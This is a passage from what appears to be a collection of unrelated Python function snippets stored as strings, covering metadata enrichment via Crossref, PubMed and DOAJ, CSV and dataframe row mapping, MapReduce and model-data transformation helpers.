get_metadata_from_crossref(doi)\n if not crossref_result[\"success\"]:\n exc = crossref_result[\"exception\"]\n # check if a preprint lookup is possible\n if not no_title_lookup and type(exc) == UnsupportedDoiTypeError and exc.doi_type == \"posted-content\":\n msg = (\"Line %s: Found a DOI with type 'posted_content' (%s). This might \" +\n \"be a case of a preprint DOI, trying to find the final version of the article...\")\n logging.info(msg, row_num, doi)\n if not exc.crossref_title:\n msg = \"Line %s: Preprint lookup failed, no title could be extracted.\"\n logging.warning(msg, row_num)\n else:\n article_doi = title_lookup(exc.crossref_title, [\"journal-article\"])\n if article_doi:\n logging.info(\"New DOI integrated, restarting enrichment for current line...\")\n index = column_map[\"doi\"].index\n row[index] = article_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n if crossref_result[\"success\"]:\n data = crossref_result[\"data\"]\n record_type = data.pop(\"doi_type\")\n logging.info(\"Crossref: DOI resolved: \" + doi + \" [\" + record_type + \"]\")\n current_row[\"indexed_in_crossref\"] = \"TRUE\"\n for key, value in data.items():\n new_value = _process_crossref_results(current_row, row_num, key, value)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Crossref: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, crossref_result[\"error_msg\"])\n current_row[\"indexed_in_crossref\"] = \"FALSE\"\n # lookup ISBNs in crossref and try to find a correct DOI\n additional_isbns = [row[i] for i in additional_isbn_columns]\n found_doi, r_type = _isbn_lookup(current_row, row_num, additional_isbns, doab_analysis.isbn_handling)\n if r_type is not None:\n record_type = r_type\n if found_doi is not None:\n # integrate DOI into row and restart\n logging.info(\"New DOI integrated, restarting enrichment for current line.\")\n index = column_map[\"doi\"].index\n row[index] = found_doi\n return process_row(row, row_num, column_map, num_required_columns, additional_isbn_columns,\n doab_analysis, doaj_analysis, no_crossref_lookup, no_pubmed_lookup,\n no_doaj_lookup, no_title_lookup, round_monetary, offsetting_mode, orig_file_path)\n # include pubmed metadata\n if not no_pubmed_lookup and record_type == \"journal-article\":\n pubmed_result = get_metadata_from_pubmed(doi)\n if pubmed_result[\"success\"]:\n logging.info(\"Pubmed: DOI resolved: \" + doi)\n data = pubmed_result[\"data\"]\n for key, value in data.items():\n if value is not None:\n new_value = value\n else:\n new_value = \"NA\"\n msg = \"WARNING: Element %s not found in in response for doi %s.\"\n logging.debug(msg, key, doi)\n old_value = current_row[key]\n current_row[key] = column_map[key].check_overwrite(old_value, new_value)\n else:\n msg = \"Line %s: Pubmed: Error while trying to resolve DOI %s: %s\"\n logging.error(msg, row_num, doi, pubmed_result[\"error_msg\"])\n\n # lookup in DOAJ. 
try the EISSN first, then ISSN and finally print ISSN\n if not no_doaj_lookup and not empty_row:\n issns = []\n new_value = \"NA\"\n if current_row[\"issn_electronic\"] != \"NA\":\n issns.append(current_row[\"issn_electronic\"])\n if current_row[\"issn\"] != \"NA\":\n issns.append(current_row[\"issn\"])\n if current_row[\"issn_print\"] != \"NA\":\n issns.append(current_row[\"issn_print\"])\n for issn in issns:\n lookup_result = doaj_analysis.lookup(issn)\n if lookup_result:\n msg = \"DOAJ: Journal ISSN (%s) found in DOAJ offline copy ('%s').\"\n logging.info(msg, issn, lookup_result)\n new_value = \"TRUE\"\n break\n else:\n msg = \"DOAJ: Journal ISSN (%s) not found in DOAJ offline copy.\"\n new_value = \"FALSE\"\n logging.info(msg, issn)\n old_value = current_row[\"doaj\"]\n current_row[\"doaj\"] = column_map[\"doaj\"].check_overwrite(old_value, new_value)\n if record_type != \"journal-article\" and not empty_row:\n collected_isbns = []\n for isbn_field in [\"isbn\", \"isbn_print\", \"isbn_electronic\"]:\n # test and split all ISBNs\n current_row[isbn_field] = _process_isbn(row_num, current_row[isbn_field], doab_analysis.isbn_handling)\n if has_value(current_row[isbn_field]):\n collected_isbns.append(current_row[isbn_field])\n additional_isbns = [row[i] for i in additional_isbn_columns]\n for isbn in additional_isbns:\n result = _process_isbn(row_num, isbn, doab_analysis.isbn_handling)\n if has_value(result):\n collected_isbns.append(result)\n if len(collected_isbns) == 0:\n logging.info(\"No ISBN found, skipping DOAB lookup.\")\n current_row[\"doab\"] = \"NA\"\n else:\n record_type = \"book\"\n logging.info(\"Trying a DOAB lookup with the following values: \" + str(collected_isbns))\n for isbn in collected_isbns:\n doab_result = doab_analysis.lookup(isbn)\n if doab_result is not None:\n current_row[\"doab\"] = \"TRUE\"\n msg = 'DOAB: ISBN %s found in normalized DOAB (%s, \"%s\")'\n logging.info(msg, isbn, doab_result[\"publisher\"], doab_result[\"book_title\"])\n if current_row[\"indexed_in_crossref\"] == \"TRUE\":\n msg = \"Book already found in Crossref via DOI, those results take precedence\"\n logging.info(msg)\n else:\n for key in doab_result:\n current_row[key] = doab_result[key]\n if not has_value(current_row[\"isbn\"]):\n current_row[\"isbn\"] = isbn\n break\n else:\n current_row[\"doab\"] = \"FALSE\"\n msg = \"DOAB: None of the ISBNs found in DOAB\"\n logging.info(msg)\n if offsetting_mode:\n current_row[\"agreement\"] = offsetting_mode\n record_type = \"journal-article_transagree\"\n\n if record_type is None:\n msg = \"Line %s: Could not identify record type, using default schema 'journal-article'\"\n logging.warning(msg, row_num)\n record_type = \"journal-article\"\n\n result = []\n for field in COLUMN_SCHEMAS[record_type]:\n result.append(current_row[field])\n\n return (record_type, result)", "def _transform_map_data(self):\n WARD_FMT = '%s-%s'\n self.map_data_trans = []\n lookup = {i.column: ''.join(filter(lambda x: x.isdigit(), i.value)) for i in self.sht[1]}\n\n #skip over header\n rs = iter(self.sht.rows)\n next(rs)\n next(rs)\n for r in rs:\n pka = r[0].value\n for c in r[1:]:\n if c.value is None:\n c.value = 0\n\n self.map_data_trans.append((WARD_FMT%(pka, lookup[c.column]), c.value))", "def applymap(self, func, *args, **kwargs):\n return DataFrameDefault.register(pandas.DataFrame.applymap)(\n self, func, *args, **kwargs\n )", "def iter_rows_raw(self, *args):\n\n for row in super().iter_rows_raw(*args):\n row[0] = row[1] # sequential catalog index not right in this 
case; overwrite to match finder id\n yield row", "def _map(self, p_input:Element, p_output:Element):\r\n \r\n self._sl_model.eval()\r\n\r\n # Input pre processing\r\n input = self.input_preproc(p_input)\r\n\r\n # Make prediction\r\n output = self.forward(input)\r\n\r\n # Output post processing\r\n output = self.output_postproc(output)\r\n\r\n # Set list to Element\r\n p_output.set_values(output)", "def mapfn(k, v):\n for row in v:\n # rellenar el codigo\n pass", "def prepopulate(self, model, exclude=[]):\n for col in model.columns():\n if col not in exclude and hasattr(self, col):\n setattr(getattr(self, col), 'data', getattr(model, col))", "def mutate_row(self, row_key: bytes, column_family_id: str, val_dict: dict,\n time_stamp: Optional[datetime.datetime] = None\n ) -> bigtable.row.Row:\n row = self.table.row(row_key)\n\n for column, value in val_dict.items():\n row.set_cell(column_family_id=column_family_id, column=column,\n value=value, timestamp=time_stamp)\n return row", "def map(self,Affine,i):\n map_x = np.zeros([self.num,self.d])\n for k in range(self.num):\n map_x[k,:] = Affine.apply(i,self.pick(k))\n Mapped = Model_Points(map_x)\n return Mapped", "def map (a_data,a_column,a_old,a_new) :\n loc_new_data = a_data\n a_data[a_column].replace(a_old,a_new,inplace=True)", "def create_row_processor(self, context, path, reduced_path, mapper, \n row, adapter):\n\n return None, None, None", "def mapper(record):\n matrix, row, col, value = record\n if matrix == A_MATRIX:\n # For all A(i,j) emit key (j, k) for k=1 to number of columns in B\n for k in range(0, B_COLS):\n mr.emit_intermediate((row, k), [matrix, col, value])\n else:\n # For all B(j, k) emit key (j, i) for i=1 to number of rows in B\n for i in range(0, A_ROWS):\n mr.emit_intermediate((i, col), [matrix, row, value])", "def create_row_processor(self, context, path, reduced_path, \n mapper, row, adapter):\n return None, None, None", "def map(self, obj):\n if isinstance(obj, np.ndarray) and obj.ndim >= 2 and obj.shape[0] in (2,3):\n return fn.transformCoordinates(self, obj)\n else:\n return QtGui.QMatrix4x4.map(self, obj)", "def get_model(self, payload):\n return super(BulkEntryTransformer, self).to_model(payload)", "def map_data(self, obj: object):\n pass", "def update(self, data: dict):\n for key in data:\n model_att = getattr(self.__class__, key, None)\n value = data.get(key)\n\n setattr(self, key, type(model_att.type.python_type())(value))\n\n self.commit()\n return self", "def apply_fn(self,fn):\r\n \r\n self.check_Data()\r\n for split,data_ in self.processed_data.items():\r\n x = data_['x']\r\n x = np.array([fn(xi) for xi in x])\r\n data_['x'] = x", "def _add_from_dict(self, row) :\n\n data = [row.get(col, None) for col in self.cols]\n self._insert_internal(self.cols, data)", "def apply_remap(self):\n\n if not has_remap():\n return self\n\n newdata = self.copy()\n newdata._partial_remap()\n return newdata", "def map(self):\n self.api_setup()\n for data in self._csv_data:\n mapped_data = dict()\n for key, value in data.items():\n mapped_data[CSV_MAPPING[key]] = str(value)\n self._api_data.append(mapped_data)\n\n self.csv_category_to_api()\n self.csv_attributes_to_api()\n self.csv_dimensions_to_api()\n self.csv_images_to_api()", "def get_map_for_model(self, model):\n return super().__getitem__(model)", "def map(self):\n map_rupture(self)", "def _MapValues(geol, arr):\n # TODO: check that geol table contains all indexs found in arr\n # Return the mapped table\n geol.set_index(geol.keys()[0])\n return 
geol[geol.keys()[1::]].iloc[arr]", "def update(self, mapping):\n if not ismapping(mapping):\n raise TypeError(\"mapping type required\")\n field_names = getpyattr(type(self), 'field_names')\n for key, value in mapping.items():\n if key in field_names:\n setattr(self, key, value)", "def place_types_process_rows(self):\n\n for index in range(len(self.table)):\n row_rdf = self.place_types_map_row_to_rdf(self.table.iloc[index])\n if row_rdf is not None:\n self.data += row_rdf", "def _set_document_attribute(self, doc, row, mapping):\n # Unpack mapping info.\n try:\n attr, col_idx, convertor = mapping\n except ValueError:\n try:\n attr, col_idx = mapping\n except ValueError:\n print mapping\n raise ValueError()\n convertor = None\n\n # Convert cell value.\n if col_idx.find(\"-\") == -1:\n attr_value = self._get_cell_value(row, convert_col_idx(col_idx), convertor)\n else:\n col_idx_from, col_idx_to = [convert_col_idx(i) for i in col_idx.split(\"-\")]\n attr_value = [i for i in (self._get_cell_value(row, i, convertor)\n for i in range(col_idx_from, col_idx_to + 1)) if i]\n\n # Set aattribute value.\n setattr(doc, attr, attr_value)", "def mapped(self, *args, **kwargs): # real signature unknown\r\n pass", "def mapping(db_url, data):\n _mapping = lookup.as_mapping(db_url, map(op.itemgetter(0), data), QUERY)\n for idx, value in enumerate(_mapping.values()):\n value[\"sequence\"] = value[\"sequence\"].replace(\"U\", \"T\")\n return _mapping", "def map(self, function=lambda value: value):\n for j, value in enumerate(self):\n self[j] = function(value)", "def __init__(self, row):\n state = inspect(row)\n\n # Don't store the actual row, so we can serialize.\n self._model_cls = state.class_\n self._pk = state.identity\n\n self.data = Box(dict(row))", "def map_cols_to_attr(self):\n ## this is from the base class:\n ## for attr, label in zip(self.attr_names, self.labels):\n ## col_ind = self.col_inds[label]\n ## if len(self.data) > 0:\n ## setattr(self, attr, self.data[:,col_ind])\n #\n # hard coding based on what I know about saleae files:\n self.t = self.data[:,0]#.astype(float)\n nr, nc = self.data.shape\n self.num_cols = nc-1\n \n for i in range(0,self.num_cols):\n attr = 'ch_%i' % i\n j = i+1\n setattr(self, attr, self.data[:,j])#.astype(float))", "def to_model(self, obj):\n if obj is None:\n raise UnprocessableEntity(\"expected data in request, was empty\", what=BAD_VALUE)\n \n if not isinstance(obj, Mapping):\n raise UnprocessableEntity(\"expected data object in request\", what=BAD_VALUE)\n \n return {k: self.cols_to_model[k](v) for k, v in obj.items() if k in self.cols_to_model}", "def make_row_map(file_path, key_field, field_map=None, transforms=None, \\\n file_encoding=None):\n\n with open(file_path, encoding=file_encoding) as file:\n # preprocess transforms\n if transforms:\n _transforms = {}\n for tf_field, tf in transforms.items():\n _type = type(tf).__name__\n if _type not in ['str', 'function']:\n raise ValueError('Invalid transform')\n _transforms[tf_field] = {\n 'transform': tf,\n 'type': _type\n }\n\n # get fields from csv\n fields_reader = csv.reader(file)\n fields = next(fields_reader)\n\n # make sure we aren't missing any field names\n first_row = next(fields_reader)\n if len(fields) != len(first_row):\n raise ValueError('Header has a different number of columns than data')\n\n # apply field map\n if field_map:\n # TODO use a case insensitive dictionary for field map\n fields = [field_map.get(field.lower()) or field for field in fields]\n key_field = field_map.get(key_field) or 
key_field\n\n # lowercase\n fields = [field.lower() for field in fields]\n\n # handle spaces\n fields = [field.replace(' ', '_') for field in fields]\n\n # use namedtuple for rows\n fields_joined = ' '.join(fields)\n Row = namedtuple('Row', fields_joined)\n\n # make map\n row_map = {}\n reader = csv.DictReader(file, fieldnames=fields)\n\n for i, row in enumerate(reader):\n key = row[key_field]\n\n # apply transforms\n if transforms:\n for tf_field, tf_map in _transforms.items():\n tf = tf_map['transform']\n tf_type = tf_map['type']\n source_val = row[tf_field]\n if tf_type == 'str':\n val = getattr(source_val, tf)()\n else:\n val = tf(source_val)\n row[tf_field] = val\n\n # row_map[key] = row\n # str_row = {key: str(val) for key, val in row.items()}\n row_map[key] = Row(**row)\n # from pprint import pprint\n # pprint(str_row)\n # row_map[key] = Row(**str_row)\n\n return row_map", "def transform(self, data):", "def save_column_mappings(request):\n body = json.loads(request.body)\n import_file = ImportFile.objects.get(pk=body.get('import_file_id'))\n organization = import_file.import_record.super_organization\n mappings = body.get('mappings', [])\n for mapping in mappings:\n dest_field, raw_field = mapping\n if dest_field == '':\n dest_field = None\n\n dest_cols = _column_fields_to_columns(dest_field, organization)\n raw_cols = _column_fields_to_columns(raw_field, organization)\n try:\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n except ColumnMapping.MultipleObjectsReturned:\n # handle the special edge-case where remove dupes doesn't get\n # called by ``get_or_create``\n ColumnMapping.objects.filter(\n super_organization=organization,\n column_raw__in=raw_cols,\n ).delete()\n column_mapping, created = ColumnMapping.objects.get_or_create(\n super_organization=organization,\n column_raw__in=raw_cols,\n )\n\n # Clear out the column_raw and column mapped relationships.\n column_mapping.column_raw.clear()\n column_mapping.column_mapped.clear()\n\n # Add all that we got back from the interface back in the M2M rel.\n [column_mapping.column_raw.add(raw_col) for raw_col in raw_cols]\n if dest_cols is not None:\n [\n column_mapping.column_mapped.add(dest_col)\n for dest_col in dest_cols\n ]\n\n column_mapping.user = request.user\n column_mapping.save()\n\n return {'status': 'success'}", "def map(self, datasetType, dataId):\n\n func = getattr(self, 'map_' + datasetType)\n return func(dataId)", "def transform(self, incoming_df, **transform_params):\n outgoing_df = incoming_df.copy()\n for col in self.features:\n outgoing_df[col] = outgoing_df[col].map( self.maps[col] )\n\n return outgoing_df", "def UpdateResults(self, data, row = None):\n if not self.active:\n return\n\n if row is None:\n row = self.active_row\n\n self.SetValueRaw(row, 0, row) #set FileID\n\n #take only values from fit with match column labels\n for species, fitpars in data.iteritems():\n\n #clear fit parameter entries for species TODO: always\n #cleared, even if fitpars not valid (Note: NoFit says\n #invalid\n for rawcol in self.fitparcols[species]:\n self.SetValueRaw(row, rawcol, None)\n\n if fitpars.valid:\n for key, val in fitpars.valuedict().iteritems():\n try:\n rawcol = self.colLabels.tolist().index(key+' '+species)\n self.SetValueRaw(row, rawcol, val)\n except ValueError:\n pass\n\n self.update_dynamic_cols()\n self.update_variable_cols()\n\n #uncomment this to change row selection to the newly added row\n #self.GetView().MakeCellVisible(row, 
0)\n self.GetView().Refresh()", "def _init_dict(self, data: Dict[Column, Row]):\n if not self._columns:\n self._columns = list(data.keys())\n\n # Filter values by defined columns\n columns = (\n to_list(values)\n for column, values in data.items()\n if column in self._columns\n )\n\n # Convert columns to rows\n self._data = [list(row) for row in zip_longest(*columns)]", "def process_row(row, location_map):\n\n # Add in IP columns\n ips = get_ip_extent(row[IP_PREFIX_COLUMN])\n ipv6_ips = get_ip_extent(row[IPV6_PREFIX_COLUMN])\n\n continent_code = CONTINTENT_CODES[row[CONTINENT_COLUMN]] if row[CONTINENT_COLUMN] in CONTINTENT_CODES else None\n site_id = row[SITE_COLUMN]\n\n location = location_map[site_id.lower()]\n\n # simplify\n row = {\n 'site': site_id.lower(),\n 'latitude': location['latitude'],\n 'longitude': location['longitude'],\n 'city': row[CITY_COLUMN],\n 'region_code': row[REGION_CODE_COLUMN],\n 'country_code': row[COUNTRY_CODE_COLUMN],\n 'continent_code': continent_code,\n 'min_ip_hex': hex_encode_ip(ips[0]) if ips else None,\n 'max_ip_hex': hex_encode_ip(ips[-1]) if ips else None,\n 'transit_provider': row[TRANSIT_PROVIDER],\n 'min_ip': str(ips[0]) if ips else None,\n 'max_ip': str(ips[-1]) if ips else None,\n 'ip_prefix': normalize_ip(row[IP_PREFIX_COLUMN]),\n 'min_ipv6_hex': hex_encode_ip(ipv6_ips[0]) if ipv6_ips else None,\n 'max_ipv6_hex': hex_encode_ip(ipv6_ips[-1]) if ipv6_ips else None,\n 'min_ipv6': str(ipv6_ips[0]) if ipv6_ips else None,\n 'max_ipv6': str(ipv6_ips[-1]) if ipv6_ips else None,\n 'ipv6_prefix': normalize_ip(row[IPV6_PREFIX_COLUMN]),\n }\n\n return row", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def map():", "def _map_model_dict(self, model_dict, parallel_dict):\n\n # Loop over the model_dict.\n for model_key, item_dict in model_dict.items():\n\n # Get the item type.\n item_type = self._get_item_type(item_dict)\n\n # If it's an object, use the object function.\n if item_type == 'object':\n self._add_object_to_map(model_key, item_dict)\n\n elif item_type == 'clock':\n self._add_clock_to_map(model_key, item_dict)\n\n elif item_type == 'module':\n # Map by module name.\n self._add_module_to_map(model_key, item_dict)\n\n elif item_type == 'omftype':\n # Map (only if it's a module)\n if item_dict['omftype'] == 'module':\n self._add_module_to_map(model_key, item_dict)\n\n elif item_type == 'class':\n # Map the class.\n self._add_class_to_map(model_key, item_dict)\n\n elif item_type in self.NO_MAP:\n # No mapping for now.\n pass\n\n else:\n # Unexpected type, raise warning.\n raise ValueError('Unimplemented item: {}'.format(item_dict))\n\n # If the item's dictionary contains a numeric key mapped to\n # a dictionary, we have a nested item which should be\n # mapped. This will be done recursively.\n to_pop = []\n to_add = []\n for k, v in item_dict.items():\n if isinstance(k, int):\n if isinstance(v, dict):\n # If we have 'omfEmbeddedConfigObject' we have\n # a nested configuration which needs special\n # handling.\n try:\n s = v['omfEmbeddedConfigObject'].split()\n except KeyError:\n # No extra work to do here. 
Mark that we'll\n # use the 'parent' key.\n parent = True\n else:\n # We do have an omfEmbeddedConfigObject.\n assert len(s) == 3, (\"Don't know how to handle \"\n \"embedded config objects \"\n \"like this: {}\"\n .format(v))\n\n # Not using 'parent' in this case.\n parent = False\n\n # Attempt to get the name of the object up\n # in the hierarchy.\n try:\n name = v['name']\n except KeyError:\n # This object doesn't have a name, but\n # needs one since we're going to un-nest\n # it.\n try:\n prefix = item_dict['name']\n except KeyError:\n # No name to use, make it random.\n prefix = _gen_rand_name(n=10)\n\n # Create a name based on the type of object\n # we're nesting. Example:\n # s = ['conductor_1', 'object',\n # 'triplex_line_conductor']\n # So we're grabbing \"conductor_1\".\n name = prefix + '_' + s[0]\n\n # Add the name.\n v['name'] = name\n\n # Mark this as \"to add\" later (don't modify\n # objects we're looping over)\n to_add.append((s[0], name))\n\n # Remove the 'omfEmbeddedConfigObject'\n # notation.\n del v['omfEmbeddedConfigObject']\n # Add the object definition.\n v[s[1]] = s[2]\n\n # Recurse.\n parallel_dict = \\\n self._map_model_dict(model_dict={k: v},\n parallel_dict=parallel_dict)\n\n # Mark that we need to pop this (can't pop\n # while looping over the dict)\n to_pop.append((k, parent))\n else:\n m = ('The model_dict has a numeric key that does not '\n + 'map to a dictionary!')\n raise TypeError(m)\n\n # Remove nested objects, move to top-level.\n for t in to_pop:\n k = t[0]\n parent = t[1]\n\n # Pop the object, and add the 'parent' property if\n # applicable.\n nested_item = item_dict.pop(k)\n if parent:\n try:\n nested_item['parent'] = item_dict['name']\n except KeyError:\n m = ('Nested item was nested within another item '\n + 'that does not have a name!')\n raise KeyError(m)\n\n # Put item in the parallel dictionary.\n parallel_dict[k] = nested_item\n\n # Add properties that were necessary due to our \"un-nesting\"\n for t in to_add:\n # t is a tuple like (key, value)\n item_dict[t[0]] = t[1]\n\n # Return the parallel dictionary.\n return parallel_dict", "def apply(self, transform_func):\n #input_shapes = transform_func.input_shapes\n #input_types = transform_func.input_types\n #data_shapes = transform_func.data_shapes\n #data_types = transform_func.data_types\n #assert input_shapes == self._data_shapes\n #assert input_types = self._data_types\n ret_gen = transform_func(self.generator)\n ret = type(self).from_generator_func(ret_gen)\n if self.name is not None:\n ret.name = self.name\n #ret.data_shapes = data_shapes\n #ret.data_types = data_types\n return ret", "def transform(self, data: pd.DataFrame):\n raise NotImplementedError", "def parse_csv_row(self, row):\n\n for key in self.field_map:\n if self.field_map[key] is not None:\n if key == 'marking':\n self.obstacle_data[key] = self.get_marking_value(row[self.field_map[key]].strip())\n elif key == 'lighting':\n self.obstacle_data[key] = self.get_lighting_value(row[self.field_map[key]].strip())\n elif key == 'obst_type':\n self.obstacle_data['obst_type_id'] = self.get_obstacle_type_id(row[self.field_map[key]].strip())\n else:\n self.obstacle_data[key] = row[self.field_map[key]].strip()", "def _createModelFromData(self, data):\n model = QStandardItemModel()\n model.setRowCount(len(data))\n model.setColumnCount(1)#model.setColumnCount(len(data[0]))\n # set model role names\n start_role = Qt.UserRole + 1\n role_names = {}\n for key, _ in data[0].items():\n column_index = list(data[0].keys()).index(key)\n role = 
start_role + column_index\n role_names[role] = key.encode()\n model.setItemRoleNames(role_names)\n # set model data\n for row_index, row_dict in enumerate(data):\n for key, value in row_dict.items():\n column_index = list(row_dict.keys()).index(key)\n index = model.index(row_index, 0)\n role = start_role + column_index\n model.setData(index, value, role)\n return model", "def _setMatrixRow(self, row):\n item = self._item()\n if item is not None:\n matrix = item.getMatrix()\n matrix[self._index, :] = row.x(), row.y(), row.z()\n item.setMatrix(matrix)", "def transform(self, results: Dict) -> Dict:\n\n # Apply mapping\n inputs = self._map_input(results, self.mapping)\n # Apply wrapped transforms\n outputs = self._apply_transforms(inputs)\n # Apply remapping\n outputs = self._map_output(outputs, self.remapping)\n\n results.update(outputs) # type: ignore\n return results", "def _transform_row_model(\n rowkey: str, row: dict, sep: str\n) -> models.RowModelOdd:\n keys = [\"sid\", \"lid\", \"mid\", \"mkt\", \"seq\", \"per\", \"vendor\", \"ts\"]\n info_list: list = [\"s\", \"per\", \"et\"]\n\n row_dict = dict(zip(keys, rowkey.split(sep)))\n row_dict[\"info\"] = {}\n row_dict[\"odds\"] = {}\n row_model = models.RowModelOdd(**row_dict)\n \n info_dict: dict = {}\n for col in info_list:\n col_name = \":\".join([\"info\", col])\n info_dict[col] = row[col_name.encode(\"utf-8\")]\n row_model.info = models.OddInfoModel(**info_dict)\n\n target_cols = _get_target_column_list(row_model.mkt)\n odds_dict: dict = {}\n for col in target_cols:\n col_name = \":\".join([\"odds\", col])\n odds_dict[col] = row[col_name.encode(\"utf-8\")]\n\n odd_model = None\n mkt: str = row_model.mkt\n if mkt.startswith(\"1x2\"):\n odd_model = models.ColumnModel1x2(**odds_dict)\n elif mkt.startswith(\"ah\"):\n odd_model = models.ColumnModelAH(**odds_dict)\n else:\n odd_model = models.ColumnModelOU(**odds_dict)\n\n row_model.odds = odd_model\n\n return row_model", "def apply(self):\n\n sc = SparkContext(appName=\"Model Applier\")\n sqlContext = SQLContext(sc)\n\n # Add model and supporting files to SparkContext\n for item in self.model_location_dict.items():\n ModelApplier.add_files_to_context(item[1], sc)\n\n partition_processor = self.get_partition_processor()\n infile = sc.textFile(self.input_location)\n header_line = infile.first()\n infile = infile.filter(lambda x: x != header_line)\n\n result = infile.mapPartitions(partition_processor).flatMap(lambda x: x)\n print('result.class', result.__class__)\n\n result = result.map(lambda (x, a, y, segment, model_version):\n (int(x), float(a), float(y), segment, model_version))\n sqlContext.createDataFrame(result).saveAsParquetFile(self.output_location)", "def run(self, row, **kwargs):\n self.source = row\n kwargs['output'] = self.__graph__()\n super(CSVRowProcessor, self).run(**kwargs)\n return kwargs['output']", "def _apply_transform(self):\n pass", "def _set_mapper(self, classification_dict):\n d = {class_code: class_index for class_index, class_code in enumerate(classification_dict.keys())}\n # Here we update the dict so that code 65 remains unchanged.\n # Indeed, 65 is reserved for noise/artefacts points, that will be deleted by transform \"DropPointsByClass\".\n d.update({65: 65})\n self.mapper = np.vectorize(lambda class_code: d.get(class_code))", "def load_initial_nl_mapping(matrix: list):\n print(\"Start loading...\")\n\n # delete existed objects\n # models.NominalLabelMapping.objects.all().delete()\n\n for row in matrix[1:]:\n book = row[0].strip()\n plant_code = row[1].strip()\n 
model = row[2].strip()\n value = row[3]\n\n match_object = models.NominalLabelMapping.objects.filter(\n model=model,\n value=value).first()\n if not match_object:\n match_object = models.NominalLabelMapping(\n model=model,\n value=value\n )\n setattr(match_object, 'book', book)\n setattr(match_object, 'plant_code', plant_code) \n # save models\n match_object.save()", "def apply_model_to_query(self, query):\n pass", "def update(self, data: Mapping[str, np.ndarray]) -> Self:\n\n raise NotImplementedError", "def feedDataRow(self, row, **kwargs): \n\n self.nullify()\n \n #avoid automatic call to \"read\" after _objectid changes \n self._feed = True\n self._objectid = row['objectid']\n self._feed = False\n \n self._original_values.clear()\n for cn in row:\n if cn in self._extra_sql_columns:\n self.__dict__[cn] = row[cn]\n if cn not in self._table: continue\n field = self._table[cn]\n decoded = field.val_sql2py ( row[cn] )\n self.__dict__[cn] = decoded\n self._original_values[cn] = decoded\n \n #if _astxt was not provided with the data, _reprfunc is not set,\n #get the text from database\n if '_astxt' in row:\n self._astxt = row['_astxt']\n elif self._reprfunc:\n self._astxt = self._reprfunc (self)\n else: \n self._astxt = self.TextCache[self._objectid] or \"(none)\"\n \n if self._resolve_child_ref:\n for child_handle in self._child_referencelist:\n t, f = self._table.reference_child_hash[child_handle] \n self._child_referencelist[child_handle].filter = f.name + \" = '\" + str(row['objectid']) + \"'\"\n self._child_referencelist[child_handle].reload()\n \n self._hasdata = True\n self._isnew = False\n self._ismodified = False\n self._modified_values.clear()", "def _transform(self, dataset):\n raise NotImplementedError()", "def _convert_row(self, row) :\n\n self.row_id += 1\n data = [self.row_id]\n\n if type(row) == type({}) :\n data.extend(row.get(col, None) for col in self.cols[1:])\n elif type(row) in [type([]), type(())] :\n data.extend(row)\n elif type(row) == RowReference :\n data.extend(row.values())\n else :\n raise Exception(\n 'Don''t know how to add row from: %s ' % str(row)\n )\n\n if len(data) != len(self.cols) :\n raise Exception(\n 'Wrong number of values for new row with cols %s: %s' % \n (str(self.cols), str(data))\n \n )\n\n return data", "def transform(self, X):\n\n X = super().transform(X)\n\n X[self.columns] = self.value\n\n return X", "def transform(self, data, attr):\n data['point'] = torch.from_numpy(data['point'])\n data['feat'] = torch.from_numpy(data['feat'])\n data['label'] = torch.from_numpy(data['label'])\n\n return data", "def update_old_row(self, data):\n for key, value in data.items():\n _column = self._labels.index([v['display'] for k, v in self.headers.items() if k == key].pop())\n cell = self.item(self._opt_row, _column)\n _cell_data = cell.get_data()\n _cell_data[key] = value\n\n cell.set_content(value, _cell_data)", "def map(self, function):\n pass", "def mapdata():\n return getmapdata(db, MyTable)", "def mapping_runner(self):\n if not isinstance(self.model_source, str):\n raise ValueError(\"Tried to initialize mapping without a model\")\n \n import keras\n sys.stdout.flush()\n keras.backend.clear_session()\n sys.stdout.flush()\n \n # Load model and normalization parameters\n print(\"Loading model\", self.model_source)\n model = keras.models.load_model(self.model_source)\n x_mean_std = [np.load(self.model_source + \"_x_mean.npy\"), np.load(self.model_source + \"_x_std.npy\")]\n y_mean_std = [np.load(self.model_source + \"_y_mean.npy\"), 
np.load(self.model_source + \"_y_std.npy\")]\n \n while self.run_map.value:\n sample = self.feat_in_pipe_out.recv()\n \n # Reload if needed\n if self.auto_reload == True and self.observer.check_change():\n model = keras.models.load_model(self.model_source)\n \n # Normalize\n sample = (sample - x_mean_std[0]) / x_mean_std[1]\n \n # Map\n result_sample = model.predict(sample, batch_size = 1)\n\n # Denormalize\n if self.denorm_out:\n result_sample = (result_sample * y_mean_std[1]) + y_mean_std[0]\n \n self.output_data(result_sample)\n \n sys.stdout.flush()\n keras.backend.clear_session()\n sys.stdout.flush()", "def _transform_data(self, *args, **kwargs) -> None:\n raise NotImplementedError", "def map_record(row: DLCSRecord, solr_client: Solr, config: typing.Dict) -> UrsusRecord: # pylint: disable=too-many-statements\n record: UrsusRecord = {\n field_name: map_field_value(row, field_name, config=config)\n for field_name in mapper.FIELD_MAPPING\n }\n\n # THUMBNAIL\n record[\"thumbnail_url_ss\"] = (\n record.get(\"thumbnail_url_ss\")\n or thumbnail_from_child(record, config=config)\n or thumbnail_from_manifest(record)\n )\n\n # COLLECTION NAME\n if \"Parent ARK\" in row and row[\"Parent ARK\"] in config[\"collection_names\"]:\n dlcs_collection_name = config[\"collection_names\"][row[\"Parent ARK\"]]\n record[\"dlcs_collection_name_tesim\"] = [dlcs_collection_name]\n\n # FIELDS\n record[\"uniform_title_sim\"] = record.get(\"uniform_title_tesim\")\n record[\"architect_sim\"] = record.get(\"architect_tesim\")\n record[\"author_sim\"] = record.get(\"author_tesim\")\n record[\"illuminator_sim\"] = record.get(\"illuminator_tesim\")\n record[\"scribe_sim\"] = record.get(\"scribe_tesim\")\n record[\"rubricator_sim\"] = record.get(\"rubricator_tesim\")\n record[\"commentator_sim\"] = record.get(\"commentator_tesim\")\n record[\"translator_sim\"] = record.get(\"translator_tesim\")\n record[\"lyricist_sim\"] = record.get(\"lyricist_tesim\")\n record[\"composer_sim\"] = 